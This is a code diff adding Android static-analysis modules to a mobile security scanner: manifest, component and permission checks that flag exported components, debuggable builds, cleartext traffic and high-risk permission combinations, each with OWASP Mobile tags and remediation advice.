+      if (activity.exported && !activity.permission) {
+        // Check if it has intent filters (potentially browsable)
+        const hasBrowsable = activity.intentFilters.some((f) =>
+          f.categories.includes("android.intent.category.BROWSABLE")
+        )
+
+        const severity = hasBrowsable ? "high" : "medium"
+
+        findings.push(createFinding(scanId, appId, {
+          title: `Exported Activity Without Permission: ${getShortName(activity.name)}`,
+          description: `The activity ${activity.name} is exported without a permission requirement. ${hasBrowsable ? "It is also browsable, making it accessible via deep links." : ""} Any app can start this activity.`,
+          severity,
+          owaspMobile: "M8",
+          category: "components",
+          component: activity.name,
+          evidence: `exported=true, permission=null${hasBrowsable ? ", browsable=true" : ""}`,
+          recommendation:
+            "Set android:exported=false if the activity doesn't need to be accessed by other apps, or add a custom permission requirement.",
+        }))
+      }
+
+      // Check for deep link vulnerabilities
+      for (const filter of activity.intentFilters) {
+        // Check for sensitive schemes
+        for (const scheme of filter.dataSchemes) {
+          if (SENSITIVE_SCHEMES.includes(scheme.toLowerCase())) {
+            findings.push(createFinding(scanId, appId, {
+              title: `Activity Handles Sensitive URI Scheme: ${scheme}`,
+              description: `The activity ${activity.name} handles the '${scheme}' URI scheme via intent filter. This could be exploited for path traversal or data injection attacks.`,
+              severity: "medium",
+              owaspMobile: "M8",
+              category: "components",
+              component: activity.name,
+              evidence: `scheme=${scheme}`,
+              recommendation:
+                "Validate and sanitize all URI data before processing. Consider restricting URI schemes to only those necessary.",
+            }))
+          }
+        }
+
+        // Check for wildcard host
+        if (filter.dataHosts.includes("*") || filter.dataHosts.some((h) => h.startsWith("*."))) {
+          findings.push(createFinding(scanId, appId, {
+            title: "Activity with Wildcard Host in Intent Filter",
+            description: `The activity ${activity.name} has a wildcard host pattern in its intent filter, which could allow malicious URLs to trigger the activity.`,
+            severity: "low",
+            owaspMobile: "M8",
+            category: "components",
+            component: activity.name,
+            evidence: `hosts=${filter.dataHosts.join(", ")}`,
+            recommendation: "Use specific hostnames instead of wildcards in intent filters.",
+          }))
+        }
+      }
+
+      // Check taskAffinity attacks
+      if (activity.exported && activity.taskAffinity && !activity.permission) {
+        findings.push(createFinding(scanId, appId, {
+          title: "Potential Task Hijacking Vulnerability",
+          description: `The exported activity ${activity.name} has a custom taskAffinity (${activity.taskAffinity}) without permission protection. This could allow task hijacking attacks.`,
+          severity: "medium",
+          owaspMobile: "M8",
+          category: "components",
+          component: activity.name,
+          evidence: `taskAffinity=${activity.taskAffinity}`,
+          recommendation:
+            "Add permission protection or set exported=false. Consider using launchMode=singleTask or singleInstance.",
+        }))
+      }
+    }
+
+    return findings
+  }
+
+  /**
+   * Analyze services.
+   */
+  function analyzeServices(
+    services: MobileScanTypes.AndroidComponent[],
+    scanId: string,
+    appId: string
+  ): MobileScanTypes.MobileFinding[] {
+    const findings: MobileScanTypes.MobileFinding[] = []
+
+    for (const service of services) {
+      // Check exported without permission
+      if (service.exported && !service.permission) {
+        findings.push(createFinding(scanId, appId, {
+          title: `Exported Service Without Permission: ${getShortName(service.name)}`,
+          description: `The service ${service.name} is exported without a permission requirement. Any app can bind to or start this service.`,
+          severity: "high",
+          owaspMobile: "M8",
+          category: "components",
+          component: service.name,
+          evidence: "exported=true, permission=null",
+          recommendation:
+            "Set android:exported=false if the service doesn't need to be accessed by other apps, or add a custom permission requirement.",
+        }))
+      }
+
+      // Check for dangerous intents
+      for (const filter of service.intentFilters) {
+        for (const action of filter.actions) {
+          if (DANGEROUS_ACTIONS.includes(action)) {
+            findings.push(createFinding(scanId, appId, {
+              title: `Service Listens for Sensitive Action: ${action.split(".").pop()}`,
+              description: `The service ${service.name} listens for the ${action} action, which provides access to sensitive system events.`,
+              severity: "medium",
+              owaspMobile: "M6",
+              category: "components",
+              component: service.name,
+              evidence: `action=${action}`,
+              recommendation: "Ensure the service properly validates the source and data of received intents.",
+            }))
+          }
+        }
+      }
+    }
+
+    return findings
+  }
+
+  /**
+   * Analyze broadcast receivers.
+   */
+  function analyzeReceivers(
+    receivers: MobileScanTypes.AndroidComponent[],
+    scanId: string,
+    appId: string
+  ): MobileScanTypes.MobileFinding[] {
+    const findings: MobileScanTypes.MobileFinding[] = []
+
+    for (const receiver of receivers) {
+      // Check exported without permission
+      if (receiver.exported && !receiver.permission) {
+        // Severity depends on what intents it receives
+        const hasDangerousAction = receiver.intentFilters.some((f) =>
+          f.actions.some((a) => DANGEROUS_ACTIONS.includes(a))
+        )
+
+        findings.push(createFinding(scanId, appId, {
+          title: `Exported Broadcast Receiver Without Permission: ${getShortName(receiver.name)}`,
+          description: `The broadcast receiver ${receiver.name} is exported without a permission requirement. Any app can send broadcasts to this receiver.`,
+          severity: hasDangerousAction ? "high" : "medium",
+          owaspMobile: "M8",
+          category: "components",
+          component: receiver.name,
+          evidence: "exported=true, permission=null",
+          recommendation:
+            "Set android:exported=false, add a permission requirement, or use LocalBroadcastManager for internal broadcasts.",
+        }))
+      }
+
+      // Check for dangerous broadcast intents
+      for (const filter of receiver.intentFilters) {
+        for (const action of filter.actions) {
+          if (DANGEROUS_ACTIONS.includes(action)) {
+            findings.push(createFinding(scanId, appId, {
+              title: `Receiver Listens for Sensitive Broadcast: ${action.split(".").pop()}`,
+              description: `The receiver ${receiver.name} listens for the ${action} broadcast, which provides access to sensitive system events.`,
+              severity: "medium",
+              owaspMobile: "M6",
+              category: "components",
+              component: receiver.name,
+              evidence: `action=${action}`,
+              recommendation: "Ensure the receiver properly validates received broadcasts and doesn't leak sensitive data in response.",
+            }))
+          }
+        }
+
+        // Check for implicit broadcast vulnerability
+        if (filter.actions.length > 0 && receiver.exported && !receiver.permission) {
+          findings.push(createFinding(scanId, appId, {
+            title: "Receiver Vulnerable to Broadcast Injection",
+            description: `The exported receiver ${receiver.name} can receive broadcasts from any app, potentially leading to broadcast injection attacks.`,
+            severity: "medium",
+            owaspMobile: "M8",
+            category: "components",
+            component: receiver.name,
+            evidence: `actions=${filter.actions.join(", ")}`,
+            recommendation:
+              "Add permission protection or validate the source of received broadcasts. Consider using LocalBroadcastManager.",
+          }))
+        }
+      }
+    }
+
+    return findings
+  }
+
+  /**
+   * Analyze content providers.
+   */
+  function analyzeProviders(
+    providers: MobileScanTypes.AndroidComponent[],
+    scanId: string,
+    appId: string
+  ): MobileScanTypes.MobileFinding[] {
+    const findings: MobileScanTypes.MobileFinding[] = []
+
+    for (const provider of providers) {
+      // Check exported without permission
+      if (provider.exported && !provider.permission && !provider.readPermission && !provider.writePermission) {
+        findings.push(createFinding(scanId, appId, {
+          title: `Exported Content Provider Without Permission: ${getShortName(provider.name)}`,
+          description: `The content provider ${provider.name} is exported without any permission requirements. Any app can read from or write to this provider.`,
+          severity: "critical",
+          owaspMobile: "M9",
+          category: "components",
+          component: provider.name,
+          evidence: "exported=true, no permissions",
+          recommendation:
+            "Set android:exported=false or add read/write permission requirements. Consider implementing path-level permissions.",
+        }))
+      }
+
+      // Check grantUriPermissions
+      if (provider.grantUriPermissions && provider.exported) {
+        findings.push(createFinding(scanId, appId, {
+          title: `Content Provider with URI Permission Grants: ${getShortName(provider.name)}`,
+          description: `The provider ${provider.name} can grant URI permissions. This could be exploited for data access if combined with intent redirection vulnerabilities.`,
+          severity: "medium",
+          owaspMobile: "M9",
+          category: "components",
+          component: provider.name,
+          evidence: "grantUriPermissions=true",
+          recommendation:
+            "Ensure URI permission grants are properly scoped. Consider using path-permissions to restrict access.",
+        }))
+      }
+
+      // Check authorities for common patterns
+      if (provider.authorities) {
+        if (provider.authorities.includes("*") || provider.authorities.includes("..")) {
+          findings.push(createFinding(scanId, appId, {
+            title: "Content Provider with Suspicious Authority Pattern",
+            description: `The provider ${provider.name} has a suspicious authority pattern (${provider.authorities}) that could indicate path traversal vulnerabilities.`,
+            severity: "high",
+            owaspMobile: "M9",
+            category: "components",
+            component: provider.name,
+            evidence: `authorities=${provider.authorities}`,
+            recommendation: "Use specific authority names and validate all content URI paths.",
+          }))
+        }
+      }
+    }
+
+    return findings
+  }
+
+  /**
+   * Get short component name.
+   */
+  function getShortName(fullName: string): string {
+    const parts = fullName.split(".")
+    return parts[parts.length - 1]
+  }
+
+  /**
+   * Get exported components summary.
+   */
+  export function getSummary(manifest: MobileScanTypes.AndroidManifest): {
+    total: number
+    exported: number
+    unprotected: number
+    byType: Record<string, { total: number; exported: number; unprotected: number }>
+  } {
+    const byType: Record<string, { total: number; exported: number; unprotected: number }> = {
+      activities: { total: 0, exported: 0, unprotected: 0 },
+      services: { total: 0, exported: 0, unprotected: 0 },
+      receivers: { total: 0, exported: 0, unprotected: 0 },
+      providers: { total: 0, exported: 0, unprotected: 0 },
+    }
+
+    const processComponents = (
+      components: MobileScanTypes.AndroidComponent[],
+      type: string
+    ): void => {
+      for (const comp of components) {
+        byType[type].total++
+        if (comp.exported) {
+          byType[type].exported++
+          if (!comp.permission) {
+            byType[type].unprotected++
+          }
+        }
+      }
+    }
+
+    processComponents(manifest.activities, "activities")
+    processComponents(manifest.services, "services")
+    processComponents(manifest.receivers, "receivers")
+    processComponents(manifest.providers, "providers")
+
+    return {
+      total: Object.values(byType).reduce((sum, t) => sum + t.total, 0),
+      exported: Object.values(byType).reduce((sum, t) => sum + t.exported, 0),
+      unprotected: Object.values(byType).reduce((sum, t) => sum + t.unprotected, 0),
+      byType,
+    }
+  }
+
+  /**
+   * Create finding helper.
+   */
+  function createFinding(
+    scanId: string,
+    appId: string,
+    data: {
+      title: string
+      description: string
+      severity: MobileScanTypes.Severity
+      owaspMobile: MobileScanTypes.OwaspMobile
+      category: string
+      component?: string
+      evidence?: string
+      recommendation?: string
+    }
+  ): MobileScanTypes.MobileFinding {
+    return {
+      id: MobileScanStorage.createFindingId(),
+      scanId,
+      appId,
+      platform: "android",
+      title: data.title,
+      description: data.description,
+      severity: data.severity,
+      owaspMobile: data.owaspMobile,
+      category: data.category,
+      component: data.component,
+      evidence: data.evidence,
+      recommendation: data.recommendation || "Review and fix the security issue.",
+      references: [],
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/mobilescan/android/index.ts b/packages/opencode/src/pentest/mobilescan/android/index.ts
new file mode 100644
index 00000000000..6b49d6033f6
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/android/index.ts
@@ -0,0 +1,12 @@
+/**
+ * @fileoverview Android Analysis Module
+ *
+ * Android-specific security analysis for APK files.
+ *
+ * @module pentest/mobilescan/android
+ */
+
+export { ManifestAnalyzer } from "./manifest"
+export { PermissionAnalyzer } from "./permissions"
+export { ComponentAnalyzer } from "./components"
+export { AndroidSecurityAnalyzer } from "./security"
diff --git a/packages/opencode/src/pentest/mobilescan/android/manifest.ts b/packages/opencode/src/pentest/mobilescan/android/manifest.ts
new file mode 100644
index 00000000000..445823ce74a
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/android/manifest.ts
@@ -0,0 +1,227 @@
+/**
+ * @fileoverview Android Manifest Analysis
+ *
+ * Analyzes AndroidManifest.xml for security issues and misconfigurations.
+ *
+ * @module pentest/mobilescan/android/manifest
+ */
+
+import { MobileScanTypes } from "../types"
+import { MobileScanStorage } from "../storage"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "mobilescan.android.manifest" })
+
+/**
+ * Android Manifest analyzer namespace.
+ */
+export namespace ManifestAnalyzer {
+  /**
+   * Analyze manifest for security issues.
+   */
+  export function analyze(
+    manifest: MobileScanTypes.AndroidManifest,
+    scanId: string,
+    appId: string
+  ): MobileScanTypes.MobileFinding[] {
+    log.info("Analyzing Android manifest", { packageName: manifest.packageName })
+
+    const findings: MobileScanTypes.MobileFinding[] = []
+
+    // Check debuggable
+    if (manifest.debuggable) {
+      findings.push(createFinding(scanId, appId, {
+        title: "Application is Debuggable",
+        description:
+          "The application has android:debuggable=true set in the manifest. This allows attackers to attach a debugger, inspect memory, and bypass security controls.",
+        severity: "high",
+        owaspMobile: "M8",
+        category: "configuration",
+        recommendation: "Set android:debuggable=false for production builds.",
+        references: ["https://developer.android.com/guide/topics/manifest/application-element#debug"],
+      }))
+    }
+
+    // Check allowBackup
+    if (manifest.allowBackup) {
+      findings.push(createFinding(scanId, appId, {
+        title: "Application Backup Enabled",
+        description:
+          "The application allows backup (android:allowBackup=true). This could allow attackers with physical access or ADB access to extract application data.",
+        severity: "medium",
+        owaspMobile: "M9",
+        category: "configuration",
+        recommendation:
+          "Set android:allowBackup=false or implement a BackupAgent that excludes sensitive data. Consider using android:fullBackupContent to specify what to back up.",
+        references: ["https://developer.android.com/guide/topics/data/autobackup"],
+      }))
+    }
+
+    // Check cleartext traffic
+    if (manifest.usesCleartextTraffic === true) {
+      findings.push(createFinding(scanId, appId, {
+        title: "Cleartext Traffic Allowed",
+        description:
+          "The application explicitly allows cleartext (HTTP) traffic via android:usesCleartextTraffic=true. This makes network communications vulnerable to interception.",
+        severity: "high",
+        owaspMobile: "M5",
+        category: "network",
+        recommendation:
+          "Set android:usesCleartextTraffic=false and use HTTPS for all network communications. If specific domains need HTTP, use a Network Security Configuration.",
+        references: ["https://developer.android.com/guide/topics/manifest/application-element#usesCleartextTraffic"],
+      }))
+    }
+
+    // Check for missing network security config (API 24+)
+    if (manifest.targetSdkVersion >= 24 && !manifest.networkSecurityConfig) {
+      findings.push(createFinding(scanId, appId, {
+        title: "Missing Network Security Configuration",
+        description:
+          "The application targets API 24+ but does not define a Network Security Configuration. Consider using one to enforce certificate pinning and restrict cleartext traffic.",
+        severity: "info",
+        owaspMobile: "M5",
+        category: "network",
+        recommendation: "Add a Network Security Configuration to enforce HTTPS and certificate pinning.",
+        references: ["https://developer.android.com/training/articles/security-config"],
+      }))
+    }
+
+    // Check sharedUserId
+    if (manifest.sharedUserId) {
+      findings.push(createFinding(scanId, appId, {
+        title: "Shared User ID Configured",
+        description: `The application uses a shared user ID (${manifest.sharedUserId}). This allows data sharing with other apps signed with the same certificate, but could expose data if another app is compromised.`,
+        severity: "low",
+        owaspMobile: "M9",
+        category: "configuration",
+        evidence: manifest.sharedUserId,
+        recommendation: "Evaluate if shared user ID is necessary. Prefer using content providers with proper permissions for data sharing.",
+      }))
+    }
+
+    // Check targetSdkVersion
+    if (manifest.targetSdkVersion < 30) {
+      findings.push(createFinding(scanId, appId, {
+        title: "Outdated Target SDK Version",
+        description: `The application targets SDK ${manifest.targetSdkVersion}, which is outdated. Newer SDK versions include important security features and permission improvements.`,
+        severity: "low",
+        owaspMobile: "M8",
+        category: "configuration",
+        evidence: `targetSdkVersion=${manifest.targetSdkVersion}`,
+        recommendation: "Update targetSdkVersion to the latest stable Android API level (34+).",
+        references: ["https://developer.android.com/google/play/requirements/target-sdk"],
+      }))
+    }
+
+    // Check minSdkVersion (for security features)
+    if (manifest.minSdkVersion < 23) {
+      findings.push(createFinding(scanId, appId, {
+        title: "Low Minimum SDK Version",
+        description: `The application supports Android versions below API 23 (minSdkVersion=${manifest.minSdkVersion}). Older Android versions lack important security features like runtime permissions and SELinux enforcement.`,
+        severity: "low",
+        owaspMobile: "M8",
+        category: "configuration",
+        evidence: `minSdkVersion=${manifest.minSdkVersion}`,
+        recommendation: "Consider increasing minSdkVersion to at least 23 (Android 6.0) for better security features.",
+      }))
+    }
+
+    return findings
+  }
+
+  /**
+   * Get exported components count.
+   */
+  export function getExportedComponentsCount(manifest: MobileScanTypes.AndroidManifest): {
+    activities: number
+    services: number
+    receivers: number
+    providers: number
+  } {
+    return {
+      activities: manifest.activities.filter((c) => c.exported).length,
+      services: manifest.services.filter((c) => c.exported).length,
+      receivers: manifest.receivers.filter((c) => c.exported).length,
+      providers: manifest.providers.filter((c) => c.exported).length,
+    }
+  }
+
+  /**
+   * Get components without permission protection.
+   */
+  export function getUnprotectedComponents(manifest: MobileScanTypes.AndroidManifest): MobileScanTypes.AndroidComponent[] {
+    const allComponents = [
+      ...manifest.activities,
+      ...manifest.services,
+      ...manifest.receivers,
+      ...manifest.providers,
+    ]
+
+    return allComponents.filter((c) => c.exported && !c.permission)
+  }
+
+  /**
+   * Format manifest summary.
+   */
+  export function formatSummary(manifest: MobileScanTypes.AndroidManifest): string {
+    const lines: string[] = []
+
+    lines.push(`Package: ${manifest.packageName}`)
+    lines.push(`Version: ${manifest.versionName} (${manifest.versionCode})`)
+    lines.push(`SDK: ${manifest.minSdkVersion} - ${manifest.targetSdkVersion}`)
+    lines.push("")
+    lines.push("Security Settings:")
+    lines.push(`  Debuggable: ${manifest.debuggable ? "Yes (WARNING)" : "No"}`)
+    lines.push(`  Allow Backup: ${manifest.allowBackup ? "Yes (WARNING)" : "No"}`)
+    lines.push(`  Cleartext Traffic: ${manifest.usesCleartextTraffic === true ? "Yes (WARNING)" : manifest.usesCleartextTraffic === false ? "No" : "Default"}`)
+    lines.push(`  Network Security Config: ${manifest.networkSecurityConfig || "Not specified"}`)
+    lines.push("")
+    lines.push("Components:")
+    lines.push(`  Activities: ${manifest.activities.length} (${manifest.activities.filter((c) => c.exported).length} exported)`)
+    lines.push(`  Services: ${manifest.services.length} (${manifest.services.filter((c) => c.exported).length} exported)`)
+    lines.push(`  Receivers: ${manifest.receivers.length} (${manifest.receivers.filter((c) => c.exported).length} exported)`)
+    lines.push(`  Providers: ${manifest.providers.length} (${manifest.providers.filter((c) => c.exported).length} exported)`)
+    lines.push("")
+    lines.push(`Permissions: ${manifest.permissions.length}`)
+    lines.push(`Features: ${manifest.usesFeatures.length}`)
+    lines.push(`Libraries: ${manifest.usesLibraries.length}`)
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Create finding helper.
+   */
+  function createFinding(
+    scanId: string,
+    appId: string,
+    data: {
+      title: string
+      description: string
+      severity: MobileScanTypes.Severity
+      owaspMobile: MobileScanTypes.OwaspMobile
+      category: string
+      evidence?: string
+      recommendation?: string
+      references?: string[]
+    }
+  ): MobileScanTypes.MobileFinding {
+    return {
+      id: MobileScanStorage.createFindingId(),
+      scanId,
+      appId,
+      platform: "android",
+      title: data.title,
+      description: data.description,
+      severity: data.severity,
+      owaspMobile: data.owaspMobile,
+      category: data.category,
+      evidence: data.evidence,
+      recommendation: data.recommendation || "Review and fix the security issue.",
+      references: data.references || [],
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/mobilescan/android/permissions.ts b/packages/opencode/src/pentest/mobilescan/android/permissions.ts
new file mode 100644
index 00000000000..a698ee7d605
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/android/permissions.ts
@@ -0,0 +1,428 @@
+/**
+ * @fileoverview Android Permission Analysis
+ *
+ * Analyzes Android permissions for security risks and privacy concerns.
+ *
+ * @module pentest/mobilescan/android/permissions
+ */
+
+import { MobileScanTypes } from "../types"
+import { MobileScanStorage } from "../storage"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "mobilescan.android.permissions" })
+
+/**
+ * Permission analyzer namespace.
+ */
+export namespace PermissionAnalyzer {
+  /**
+   * Permission risk categories.
+   */
+  export const PERMISSION_RISKS: Record<string, {
+    risk: MobileScanTypes.Severity
+    category: string
+    description: string
+  }> = {
+    // Location
+    "android.permission.ACCESS_FINE_LOCATION": {
+      risk: "high",
+      category: "location",
+      description: "Precise GPS location access",
+    },
+    "android.permission.ACCESS_COARSE_LOCATION": {
+      risk: "medium",
+      category: "location",
+      description: "Approximate location access",
+    },
+    "android.permission.ACCESS_BACKGROUND_LOCATION": {
+      risk: "high",
+      category: "location",
+      description: "Background location tracking",
+    },
+    // Camera & Microphone
+    "android.permission.CAMERA": {
+      risk: "high",
+      category: "media",
+      description: "Camera access",
+    },
+    "android.permission.RECORD_AUDIO": {
+      risk: "high",
+      category: "media",
+      description: "Microphone/audio recording",
+    },
+    // Contacts & Calendar
+    "android.permission.READ_CONTACTS": {
+      risk: "high",
+      category: "personal_data",
+      description: "Read contacts",
+    },
+    "android.permission.WRITE_CONTACTS": {
+      risk: "high",
+      category: "personal_data",
+      description: "Modify contacts",
+    },
+    "android.permission.READ_CALENDAR": {
+      risk: "medium",
+      category: "personal_data",
+      description: "Read calendar events",
+    },
+    "android.permission.WRITE_CALENDAR": {
+      risk: "medium",
+      category: "personal_data",
+      description: "Modify calendar events",
+    },
+    // Phone
+    "android.permission.READ_PHONE_STATE": {
+      risk: "high",
+      category: "phone",
+      description: "Read device identifiers, call state",
+    },
+    "android.permission.READ_PHONE_NUMBERS": {
+      risk: "high",
+      category: "phone",
+      description: "Read phone numbers",
+    },
+    "android.permission.CALL_PHONE": {
+      risk: "high",
+      category: "phone",
+      description: "Make phone calls",
+    },
+    "android.permission.ANSWER_PHONE_CALLS": {
+      risk: "medium",
+      category: "phone",
+      description: "Answer incoming calls",
+    },
+    "android.permission.READ_CALL_LOG": {
+      risk: "high",
+      category: "phone",
+      description: "Read call history",
+    },
+    "android.permission.WRITE_CALL_LOG": {
+      risk: "high",
+      category: "phone",
+      description: "Modify call history",
+    },
+    "android.permission.PROCESS_OUTGOING_CALLS": {
+      risk: "high",
+      category: "phone",
+      description: "Intercept outgoing calls",
+    },
+    // SMS
+    "android.permission.SEND_SMS": {
+      risk: "high",
+      category: "sms",
+      description: "Send SMS messages",
+    },
+    "android.permission.RECEIVE_SMS": {
+      risk: "high",
+      category: "sms",
+      description: "Receive SMS messages",
+    },
+    "android.permission.READ_SMS": {
+      risk: "high",
+      category: "sms",
+      description: "Read SMS messages",
+    },
+    "android.permission.RECEIVE_MMS": {
+      risk: "medium",
+      category: "sms",
+      description: "Receive MMS messages",
+    },
+    // Storage
+    "android.permission.READ_EXTERNAL_STORAGE": {
+      risk: "medium",
+      category: "storage",
+      description: "Read external storage",
+    },
+    "android.permission.WRITE_EXTERNAL_STORAGE": {
+      risk: "medium",
+      category: "storage",
+      description: "Write external storage",
+    },
+    "android.permission.MANAGE_EXTERNAL_STORAGE": {
+      risk: "high",
+      category: "storage",
+      description: "Full external storage access",
+    },
+    // Sensors
+    "android.permission.BODY_SENSORS": {
+      risk: "high",
+      category: "sensors",
+      description: "Body sensor data",
+    },
+    "android.permission.ACTIVITY_RECOGNITION": {
+      risk: "medium",
+      category: "sensors",
+      description: "Activity recognition",
+    },
+    // System
+    "android.permission.SYSTEM_ALERT_WINDOW": {
+      risk: "high",
+      category: "system",
+      description: "Draw over other apps",
+    },
+    "android.permission.REQUEST_INSTALL_PACKAGES": {
+      risk: "high",
+      category: "system",
+      description: "Request app installs",
+    },
+    "android.permission.WRITE_SETTINGS": {
+      risk: "medium",
+      category: "system",
+      description: "Modify system settings",
+    },
+    "android.permission.QUERY_ALL_PACKAGES": {
+      risk: "medium",
+      category: "system",
+      description: "Query all installed packages",
+    },
+    // Network
+    "android.permission.ACCESS_WIFI_STATE": {
+      risk: "low",
+      category: "network",
+      description: "Wi-Fi connection info",
+    },
+    "android.permission.CHANGE_WIFI_STATE": {
+      risk: "medium",
+      category: "network",
+      description: "Change Wi-Fi connectivity",
+    },
+    // Accounts
+    "android.permission.GET_ACCOUNTS": {
+      risk: "medium",
+      category: "accounts",
+      description: "Access accounts on device",
+    },
+  }
+
+  /**
+   * Unusual permission combinations.
+   */
+  export const UNUSUAL_COMBINATIONS: Array<{
+    permissions: string[]
+    description: string
+    risk: MobileScanTypes.Severity
+  }> = [
+    {
+      permissions: ["android.permission.CAMERA", "android.permission.RECORD_AUDIO", "android.permission.ACCESS_FINE_LOCATION"],
+      description: "Camera + Microphone + Location: potential surveillance capability",
+      risk: "high",
+    },
+    {
+      permissions: ["android.permission.READ_SMS", "android.permission.RECEIVE_SMS", "android.permission.SEND_SMS"],
+      description: "Full SMS access: potential for SMS-based attacks or premium SMS fraud",
+      risk: "high",
+    },
+    {
+      permissions: ["android.permission.READ_CONTACTS", "android.permission.SEND_SMS"],
+      description: "Contacts + SMS: potential for spam or phishing campaigns",
+      risk: "high",
+    },
+    {
+      permissions: ["android.permission.SYSTEM_ALERT_WINDOW", "android.permission.RECORD_AUDIO"],
+      description: "Overlay + Microphone: potential for tapjacking and eavesdropping",
+      risk: "high",
+    },
+    {
+      permissions: ["android.permission.READ_CALL_LOG", "android.permission.READ_SMS", "android.permission.READ_CONTACTS"],
+      description: "Call log + SMS + Contacts: comprehensive communication monitoring",
+      risk: "high",
+    },
+  ]
+
+  /**
+   * Analyze permissions.
+   */
+  export function analyze(
+    permissions: MobileScanTypes.AndroidPermission[],
+    scanId: string,
+    appId: string
+  ): {
+    analysis: MobileScanTypes.PermissionAnalysis
+    findings: MobileScanTypes.MobileFinding[]
+  } {
+    log.info("Analyzing Android permissions", { count: permissions.length })
+
+    const findings: MobileScanTypes.MobileFinding[] = []
+    const permissionNames = permissions.map((p) => p.name)
+
+    // Count by protection level
+    let dangerous = 0
+    let normal = 0
+    let signature = 0
+    let custom = 0
+    const highRisk: string[] = []
+
+    for (const perm of permissions) {
+      if (perm.protection === "dangerous") dangerous++
+      else if (perm.protection === "normal") normal++
+      else if (perm.protection === "signature" || perm.protection === "signatureOrSystem") signature++
+      if (perm.customPermission) custom++
+
+      // Check for high-risk permissions
+      const riskInfo = PERMISSION_RISKS[perm.name]
+      if (riskInfo && (riskInfo.risk === "high" || riskInfo.risk === "critical")) {
+        highRisk.push(perm.name)
+
+        findings.push(createFinding(scanId, appId, {
+          title: `High-Risk Permission: ${perm.name.split(".").pop()}`,
+          description: `The application requests the ${riskInfo.description.toLowerCase()} permission (${perm.name}). This is a ${riskInfo.category} permission that provides access to sensitive data or functionality.`,
+          severity: riskInfo.risk,
+          owaspMobile: "M6",
+          category: "privacy",
+          evidence: perm.name,
+          recommendation: "Ensure this permission is necessary for core app functionality. Consider using alternatives or requesting permission only when needed.",
+        }))
+      }
+    }
+
+    // Check for unusual combinations
+    const unusualCombinations: string[] = []
+    for (const combo of UNUSUAL_COMBINATIONS) {
+      if (combo.permissions.every((p) => permissionNames.includes(p))) {
+        unusualCombinations.push(combo.description)
+
+        findings.push(createFinding(scanId, appId, {
+          title: "Unusual Permission Combination Detected",
+          description: combo.description,
+          severity: combo.risk,
+          owaspMobile: "M6",
+          category: "privacy",
+          evidence: combo.permissions.join(", "),
+          recommendation: "Review if all permissions in this combination are necessary. Consider the privacy implications of requesting these permissions together.",
+        }))
+      }
+    }
+
+    // Check for excessive dangerous permissions
+    if (dangerous > 10) {
+      findings.push(createFinding(scanId, appId, {
+        title: "Excessive Dangerous Permissions",
+        description: `The application requests ${dangerous} dangerous permissions. This exceeds typical app requirements and may indicate over-privileged access.`,
+        severity: "medium",
+        owaspMobile: "M6",
+        category: "privacy",
+        evidence: `${dangerous} dangerous permissions`,
+        recommendation: "Review all dangerous permissions and remove those not strictly necessary for core app functionality.",
+      }))
+    }
+
+    // Generate recommendations
+    const recommendations: string[] = []
+    if (dangerous > 5) {
+      recommendations.push("Consider reducing the number of dangerous permissions")
+    }
+    if (highRisk.length > 0) {
+      recommendations.push("Ensure all high-risk permissions are justified and documented")
+    }
+    if (unusualCombinations.length > 0) {
+      recommendations.push("Review unusual permission combinations for privacy concerns")
+    }
+
+    return {
+      analysis: {
+        total: permissions.length,
+        dangerous,
+        normal,
+        signature,
+        custom,
+        highRisk,
+        unusualCombinations,
+        recommendations,
+      },
+      findings,
+    }
+  }
+
+  /**
+   * Get permission category stats.
+   */
+  export function getCategoryStats(permissions: MobileScanTypes.AndroidPermission[]): Record<string, number> {
+    const stats: Record<string, number> = {}
+
+    for (const perm of permissions) {
+      const riskInfo = PERMISSION_RISKS[perm.name]
+      const category = riskInfo?.category || "other"
+      stats[category] = (stats[category] || 0) + 1
+    }
+
+    return stats
+  }
+
+  /**
+   * Format permissions summary.
+   */
+  export function formatSummary(analysis: MobileScanTypes.PermissionAnalysis): string {
+    const lines: string[] = []
+
+    lines.push("Permission Analysis:")
+    lines.push(`  Total: ${analysis.total}`)
+    lines.push(`  Dangerous: ${analysis.dangerous}`)
+    lines.push(`  Normal: ${analysis.normal}`)
+    lines.push(`  Signature: ${analysis.signature}`)
+    lines.push(`  Custom: ${analysis.custom}`)
+
+    if (analysis.highRisk.length > 0) {
+      lines.push("")
+      lines.push("High-Risk Permissions:")
+      for (const perm of analysis.highRisk) {
+        const shortName = perm.split(".").pop()
+        lines.push(`  - ${shortName}`)
+      }
+    }
+
+    if (analysis.unusualCombinations.length > 0) {
+      lines.push("")
+      lines.push("Unusual Combinations:")
+      for (const combo of analysis.unusualCombinations) {
+        lines.push(`  - ${combo}`)
+      }
+    }
+
+    if (analysis.recommendations.length > 0) {
+      lines.push("")
+      lines.push("Recommendations:")
+      for (const rec of analysis.recommendations) {
+        lines.push(`  - ${rec}`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Create finding helper.
+   */
+  function createFinding(
+    scanId: string,
+    appId: string,
+    data: {
+      title: string
+      description: string
+      severity: MobileScanTypes.Severity
+      owaspMobile: MobileScanTypes.OwaspMobile
+      category: string
+      evidence?: string
+      recommendation?: string
+    }
+  ): MobileScanTypes.MobileFinding {
+    return {
+      id: MobileScanStorage.createFindingId(),
+      scanId,
+      appId,
+      platform: "android",
+      title: data.title,
+      description: data.description,
+      severity: data.severity,
+      owaspMobile: data.owaspMobile,
+      category: data.category,
+      evidence: data.evidence,
+      recommendation: data.recommendation || "Review and fix the security issue.",
+      references: [],
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/mobilescan/android/security.ts b/packages/opencode/src/pentest/mobilescan/android/security.ts
new file mode 100644
index 00000000000..6f00367938a
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/android/security.ts
@@ -0,0 +1,405 @@
+/**
+ * @fileoverview Android Security Analysis
+ *
+ * Analyzes Android applications for cryptographic, storage, and network security issues.
+ *
+ * @module pentest/mobilescan/android/security
+ */
+
